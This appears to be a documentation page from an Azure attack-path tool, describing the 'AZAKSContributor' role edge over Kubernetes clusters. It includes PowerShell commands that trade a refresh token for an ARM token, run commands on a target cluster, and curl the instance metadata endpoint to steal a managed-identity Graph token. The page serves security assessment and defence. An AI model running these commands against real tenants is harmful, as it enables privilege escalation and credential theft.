Edges
AZAKSContributor
The Azure Kubernetes Service Contributor role grants full control of the target Azure Kubernetes Service Managed Cluster.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
The Azure Kubernetes Service Contributor role grants full control of the target Azure Kubernetes Service Managed Cluster.
$ARMToken = Get-ARMTokenWithRefreshToken `
-RefreshToken "0.ARwA6WgJJ9X2qk..." `
-TenantID "contoso.onmicrosoft.com"
Invoke-AzureRMAKSRunCommand `
-Token $ARMToken `
-TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" `
-Command "whoami"
Invoke-AzureRMAKSRunCommand `
-Token $ARMToken `
-TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" `
-Command \\'curl -i -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://graph.microsoft.com/&api-version=2019-08-01"\\'